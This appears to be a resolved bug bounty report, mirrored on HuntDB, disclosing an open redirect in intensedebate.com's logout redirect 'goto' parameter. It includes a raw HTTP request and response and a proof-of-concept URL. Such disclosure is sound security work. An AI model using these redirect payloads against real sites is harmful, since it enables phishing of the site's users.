Loading HuntDB...

[intensedebate.com] Open Redirect

None
A
Automattic
Submitted None
Reported by fuzzme

Vulnerability Details

Technical details and impact analysis

Open Redirect
Hello ## Summary: I have found a Open Redirect on `https://intensedebate.com//fb-connect/logoutRedir.php?goto=`, the parameters `$_GET['goto']` is reflected to the HTTP-Header Response `Location` HTTP Request ``` GET /fb-connect/logoutRedir.php?goto=\http://\ HTTP/1.1 Host: intensedebate.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: y=y; Upgrade-Insecure-Requests: 1 ``` HTTP Response ``` HTTP/1.1 302 Found Server: nginx Date: Thu, 03 Dec 2020 21:52:42 GMT Content-Type: text/html; charset=utf-8 Connection: close P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: fbName=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: fbUrl=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: fbPic=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Location: \http://\ Content-Length: 0 ``` ## POC 1) Open this following link `http://intensedebate.com//fb-connect/logoutRedir.php?goto=https://www.google.fr` and you will be redirected to google.fr Thank you, good bye Fuzzme. ## Impact An attacker can use this vulnerability to redirect users to other malicious websites, which can be used for phishing and similar attacks

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Open Redirect